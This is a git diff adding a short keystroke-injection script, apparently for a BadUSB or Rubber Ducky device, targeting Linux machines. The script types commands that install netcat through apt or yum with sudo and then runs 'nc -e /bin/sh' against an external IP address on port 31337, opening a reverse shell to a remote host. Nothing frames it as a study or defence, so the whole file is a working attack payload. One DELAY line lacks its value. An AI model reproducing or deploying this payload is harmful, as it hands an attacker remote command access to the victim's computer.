diff --git a/linux.txt b/linux.txt new file mode 100644 index 0000000..bbc983f --- /dev/null +++ b/linux.txt @@ -0,0 +1,9 @@ +DELAY 1500 +GUI r +DELAY 500 + +STRING [[ which apt ]] && sudo apt install -y netcat-openbsd +DELAY 100 +STRING [[ which yum ]] && sudo yum install -y netcat +DELAY +STRING nc -e /bin/sh 45.92.178.34 31337